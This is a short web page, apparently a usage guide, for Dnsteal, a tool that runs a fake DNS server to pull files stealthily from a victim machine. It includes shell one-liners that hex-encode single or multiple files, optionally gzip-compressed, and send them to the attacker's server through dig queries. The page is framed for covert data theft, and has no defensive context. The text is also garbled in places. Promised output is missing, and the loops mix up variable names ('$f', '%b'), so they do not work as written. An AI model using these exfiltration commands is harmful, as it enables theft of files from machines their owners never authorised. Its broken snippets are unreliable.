Dnsteal is a Data Exfiltration Tool Through DNS Requests for stealthily sending files over DNS requests. Once setup and run successfully it acts as a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.
On the server side you will see the file transfer start:
When the transfer is finished you must stop the server with CTRL-C to save the file and view the md5sum
You can verify the md5sum on the victims machine by running
Support for multiple files
Dnstool supports multiple files to be exfiltereted. Use as below.
for filename in $(ls); do for b in $(xxd -p $f); do dig +short@server %b.$filename.com; done; done
gzip compression supported
It also supports compression of the file to allow for faster transfer speeds, this can be achieved using the “-z” switch:
python dnsteal.py 127.0.0.1 –z
Then on the victim machine send a Gzipped file like below:
for b in $(gzip -c file/to/send.png | xxd -p); do dig @server $b.filename.com; done
For multiple, gzip compressed files use as below:
for filename in $(ls); do for b in $(gzip -c $filename | xxd -p); do dig +short @server %b.$filename.com; done; done